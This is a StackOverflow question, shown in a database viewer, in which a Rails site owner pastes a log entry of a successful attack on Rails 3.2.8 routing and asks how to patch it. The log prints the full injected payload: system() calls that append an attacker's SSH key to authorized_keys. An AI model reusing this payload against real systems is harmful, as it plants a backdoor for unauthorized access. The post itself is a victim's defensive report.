Databases
StackOverflow2013
Postsdbo
POActionDispatch::Routing Vulnerability Found, has it been patched?
 

Note that there are some explanatory texts on larger screens.

plurals
  1. POActionDispatch::Routing Vulnerability Found, has it been patched?
    primarykey
    data
    text
    <p>I noticed some unusual activity on my website a couple days ago so I decided to check out the production log. Here is what I found: </p> <pre><code>Started GET "/" for 74.219.112.36 at 2013-01-11 20:25:05 +0000 Processing by HomeController#logo as */* Parameters: {"exploit"=&gt;# &lt;ActionDispatch::Routing::RouteSet::NamedRouteCollection:0xcb7e650 @routes={:"foo; system('cd ~;mkdir .ssh;echo ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAIEAtHtSi4viCaMf/KeG3mxlynWEWRPV /l4+De+BBFg/xI2ybuFenYYn4clbLFugxxr1sDNr0jBgk0iMqrLbVcdc9p DjKuymKEVbsJbOqrnNMXlUtxCefeGT1piY8Z/7tapLsr+GCXokhIcB2FPzq TtOKhnJvzgA4eZSVZsVlxTwyFM= root &gt;&gt; ~/.ssh/authorized_keys')\n__END__\n"=&gt; #&lt;OpenStruct defaults={:action=&gt;"create", :controller=&gt;"foos"}, required_parts=[], requirements={:action=&gt;"create", :controller=&gt;"foos"}, segment_keys=[:format]&gt;}, @helpers=[:"hash_for_foo; system('cd ~; mkdir .ssh;echo ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAIEAtHtSi4viCaMf/KeG3mxlynWEWRPV /l4+De+BBFg/xI2ybuFenYYn4clbLFugxxr1sDNr0jBgk0iMqrLbVcdc9pDjKuymKEVbs JbOqrnNMXlUtxCefeGT1piY8Z/7tapLsr+GCXokhIcB2FPzqTtOKhnJvzgA4eZSVZsVlx TwyFM= root &gt;&gt; ~/.ssh/authorized_keys')\n__END__\n_url", :"foo; system('cd ~;mkdir .ssh;echo ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAIEAtHtSi4viCaMf/KeG3mxlynWEWRPV/l4+De+BBFg /xI2ybuFenYYn4clbLFugxxr1sDNr0jBgk0iMqrLbVcdc9pDjKuymKEVbsJbOqrnNMXlUtxCefeG T1piY8Z/7tapLsr+GCXokhIcB2FPzqTtOKhnJvzgA4eZSVZsVlxTwyFM= root &gt;&gt; ~/.ssh/authorized_keys')\n__END__\n_url", :"hash_for_foo; system('cd ~;mkdir .ssh;echo ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAIEAtHtSi4viCaMf/KeG3mxlynWEWRPV/l4+De+BBFg /xI2ybuFenYYn4clbLFugxxr1sDNr0jBgk0iMqrLbVcdc9pDjKuymKEVbsJbOqrnNMXlUt xCefeGT1piY8Z/7tapLsr+GCXokhIcB2FPzqTtOKhnJvzgA4eZSVZsVlxTwyFM= root &gt;&gt; ~/.ssh/authorized_keys')\n__END__\n_path", :"foo; system('cd ~;mkdir .ssh; echo ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAIEAtHtSi4viCaMf/KeG3mxlynWEWRPV/l4+De+BBFg /xI2ybuFenYYn4clbLFugxxr1sDNr0jBgk0iMqrLbVcdc9pDjKuymKEVbsJbOqrnNMXlUtxCefeG T1piY8Z/7tapLsr+GCXokhIcB2FPzqTtOKhnJvzgA4eZSVZsVlxTwyFM= root &gt;&gt; ~/.ssh/authorized_keys')\n__END__\n_path"], @module=#&lt;Module:0xcb7e5c4&gt;&gt;} Rendered landing_users/_form.html.haml (4.7ms) Rendered home/logo.html.haml within layouts/application (7.8ms) Completed 200 OK in 11ms (Views: 10.4ms | ActiveRecord: 0.0ms) </code></pre> <p>I went on to check if their system calls worked and sure enough in ~/.ssh/authorized_keys I found the same ssh key. So this means they were able to run system calls through my rails app!!!! Thankfully my rails app isn't run under root so they did not get root access. But regardless this terrifies me. </p> <p>Has anyone encountered this exploit before? If so how did you patch it? </p> <p>My rails app is on Ubuntu 12.04, using rails version 3.2.8 and ruby version 1.9.3p125. If any other information would help out please let me know! </p> <p>I found a <a href="http://ronin-ruby.github.com/blog/2013/01/09/rails-pocs.html" rel="nofollow">blog post</a> referring to this exploit but no solutions, just how to perform it. </p>
    singulars
    1. PO
      singulars
      1. PTAnswer
    1. This table or related slice is empty.
    1. PTQuestion
    1. This table or related slice is empty.
    1. USronin
    plurals
    1. This table or related slice is empty.
    1. This table or related slice is empty.
    1. This table or related slice is empty.
    1. PO
      singulars
      1. PTAnswer
    1. VO
      singulars
      1. POActionDispatch::Routing Vulnerability Found, has it been patched?
      1. This table or related slice is empty.
      1. VTUpMod
    2. VO
      singulars
      1. POActionDispatch::Routing Vulnerability Found, has it been patched?
      1. This table or related slice is empty.
      1. VTUpMod
    3. VO
      singulars
      1. POActionDispatch::Routing Vulnerability Found, has it been patched?
      1. This table or related slice is empty.
      1. VTUpMod
    1. COVery scary! O_O
      singulars
      1. POActionDispatch::Routing Vulnerability Found, has it been patched?
      1. USPatashu
    2. COWow, you got me scared there for a moment.
      singulars
      1. POActionDispatch::Routing Vulnerability Found, has it been patched?
      1. USMads Ohm Larsen
 

Querying!

 
Guidance
A row detail

Detail views are divided into sections. All the information in the data section comes from columns in the selected row. The other sections display data from other, related rows.

Related data can be related in a to-one or a to-many fashion. Captions of data related in a to-many fashion link to a list view showing a filtered view of the table.

Try moving around until you find a non-empty to-many entry and click on the label to get to one. You can move back to the root by clicking on the database name in the header.

SQuiL has stopped working due to an internal error.

If you are curious you may find further information in the browser console, which is accessible through the devtools (F12).

Reload